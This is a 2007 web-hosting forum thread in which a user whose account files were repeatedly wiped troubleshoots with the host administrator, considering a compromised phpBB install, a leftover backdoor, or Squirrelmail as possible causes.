News:

The anti-spam plugins have stopped being effective. Registration is back to requiring approval. After registering, you must ALSO email me with your username, so that I can manually approve your account.

Main Menu

Files keep getting wiped out

Started by deltha, October 16, 2007, 01:51:49 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

deltha

October 16, 2007, 01:51:49 PM Last Edit: October 16, 2007, 05:38:07 PM by deltha
In the last 10 days or so my files (all of them - including public_html folders) have been wipe out. At first I thought it might be a phpbb security issue and I've uploaded a static version of my site(just htmls without phpbb) and changed all my passwords(main and mysql). And today again all the files have been wiped out... Do you know what's going on? :(

Xepher

#1
October 17, 2007, 06:14:03 AM Last Edit: October 17, 2007, 06:15:35 AM by Xepher
That is highly bizarre. The SSH logs show only one IP logging in with your username in the past week, and it's from astral.ro. I'm going to guess that's actually you. FTP has no login attempts for your username. That leaves the issue being with something already in your account, such as a compromised forum installation. You say you've uploaded a static site, but there's a forum installed with a lot of php files there. Any one of those could be compromised and I have no easy way to tell. You'd pretty much have to look through the files by hand to see if there was some hack in there. It could just be some really rare glitch that, for example, removes all your files when it was trying to remove an unused avatar image or something. I was going to set up a file watch on your directory that'll notify me of any changes and what time the changes happened, but the kernel isn't compiled with the inotify option, and I'm not rebooting the system just to add it. Sorry. I'll try and keep an eye on your account though. Lemme know if anything else happens.

deltha

#2
October 17, 2007, 06:34:28 AM Last Edit: October 17, 2007, 06:46:33 AM by deltha
I've added the SMF after I posted the topic. That IP is my IP and I am the only one who has access to that computer. Is there a script to initialize the user home directory or something?  or squirrelmail trying to do something?. Cause I've noticed some problems with squirrelmail just before this happened. Maybe they are related :). Thanks!

Xepher

#3
October 17, 2007, 10:42:03 AM
Only thing that should touch home directories is if you run the "fix permissions" tool, and that only calls chmod... no chance of removing anything at all. Squirrelmail runs entirely separate from your account, and connects only to the IMAP server for mail. All it's scripts/settings are stored/run from the main website, under the webroot user. It wouldn't have permission to delete files you own even if it tried to. No, it would have to be something running as your user. The prime suspect is still a .php file that got exploited, which is quite likely if you were running phpBB. Now that you've moved to different files and a new forum, lemme know if it happens again. I'm betting someone did gain access to your account, then deleted everything to cover their tracks. Hopefully it's taken care of with phpBB gone and your passwords changed.

deltha

#4
October 17, 2007, 01:30:15 PM
The second 'wipe-out' happened after I have uploaded a new public_html only with static content and I've changed all the passwords. So it's really weird. After that I've created this topic and uploaded a new version (with SMF). Seems to be okay. I still think maybe it's squirrel. The script runs with user credentials and is able to create mail folders. Maybe there is a issue there. However I've switched to Thunderbird and I'll try to avoid squirrelmail in the future just to be sure :D. Let's hope it doesn't happen again although now I'm prepared with a backup :D. Thanks for your help!

Xepher

#5
October 17, 2007, 04:08:52 PM
Squirrelmail does NOT run with user credentials. It runs as user/group webroot/webroot. It accesses the IMAP server in exactly the same way as thunderbird would, and THAT process (IMAPd) can create/delete mail folders and such. I suppose it's possible that it deleted your stuff, but no one else has reported any such problem, including me, and I use IMAP pretty much 24/7. Maybe some bizarrely formated email managed to break things or something, or maybe it's a combination of squirrelmail misprocessing an email and causing some bizzare "delete everything" command to be sent through to the IMAP server. I'd have to think the odds of that are amazingly slim... especially since it happened twice to you. Because if it's something so direct... if you've got a backup, I'd suggest going into squirrelmail intentionally and trying to MAKE it happen again. If it does, then we know where the problem is for sure, and can stop worrying about other possibilities/attacks. Otherwise, my bet is still on some attack. Maybe the first attack left some backdoor daemon running, and the attacker was still "in" the system and wiped stuff a second time when he finished.

deltha

#6
October 17, 2007, 05:01:22 PM
Yeah you're right... sorry. I had to blame something :D. I'll try to reproduce it tomorrow and I'll let you know if something happens :).

Databits

#7
October 19, 2007, 01:18:10 AM
Have you bothered to check your bash history and such? Grep your php files for functions like unlink(), curl(), etc... ?
(\_/)    ~Relakuyae D'Selemae
(o.O)    
(")_(")  [Libre Office] [Chrome]

Xepher

#8
October 19, 2007, 09:48:23 PM
The .bash_history file was actually wiped out too. I looked at it had all of 3 lines in it, unziping "site.zip" (or some such) when he restored it. I didn't check the php, as it's a new SMF install, so it was kinda pointless.
Print
Go Up Pages1
User actions